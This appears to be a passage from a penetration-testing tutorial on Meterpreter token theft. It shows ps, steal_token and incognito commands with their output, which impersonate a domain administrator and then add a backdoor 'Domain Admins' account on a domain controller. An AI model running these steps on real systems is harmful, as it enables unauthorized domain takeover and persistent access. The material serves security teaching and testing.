Using ps

For this example, we’ll use the Meterpreter function ps to list the applications running and show under which account they are running. We’ll use the domain name SNEAKS.IN and the user account ihazdomainadmin .

meterpreter > ps

Process list
============

 PID   Name                 Arch  Session  User                          Path
 ---   ----                 ----  -------  ----                          ----
 0     [System Process]
 4     System               x86   0        NT AUTHORITY\SYSTEM
380    cmd.exe              x86   0      SNEAKS.IN\ihazdomainadmin
   \System\
    Root\System32\cmd.exe

. . . SNIP . . .

meterpreter >

As shown in the following listing, we leverage steal_token and the PID (380 in this case) to steal the token of that user and assume the role of the domain administrator:

meterpreter > steal_token 380
Stolen token with username: SNEAKS.IN\ihazdomainadmin
meterpreter >

We have successfully impersonated the domain administrator account and Meterpreter is now running under the context of that user.

In some cases, ps may not list a running process running as a domain administrator. We can leverage incognito to list available tokens on the system as well. When performing a penetration test, we should check the output of both ps and icognito because the results may vary.

We load incognito with use incognito and then list tokens with list_tokens -u. Looking through the list of tokens, we see the SNEAKS.IN\ihazdomainadmin user account at . Now we can pretend to be someone else.

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
SNEAKS.IN\ihazdomainadmin 
IHAZSECURITY\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

As shown in the next listing, we successfully impersonate the ihazdomainadmin token at and add a user account at , which we then give domain administrator rights at . (Be sure to use two backslashes, \\, when entering the DOMAIN\USERNAME at .) Our domain controller is 192.168.33.50.

meterpreter > impersonate_token SNEAKS.IN\\ihazdomainadmin 
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\ihazdomainadmin
meterpreter > add_user omgcompromised p@55w0rd! -h 192.168.33.50 
[*] Attempting to add user omgcompromised to host 192.168.33.50
[+] Successfully added user
meterpreter > add_group_user "Domain Admins" omgcompromised -h 192.168.33.50
 
[*]   Attempting to add user omgcompromised to
 group Domain Admins on domain controller
    192.168.33.50
[+] Successfully added user to group

When entering the add_user and add_group_user commands, be sure to specify the -h flag, which tells Incognito where to add the domain administrator account. In this case, that would be the IP address of a domain controller. The implications for this attack are devastating: Essentially, the Kerberos token on any system that a domain administrator logs into can be assumed and used to access the entire domain. This means that every server on your network is your weakest link!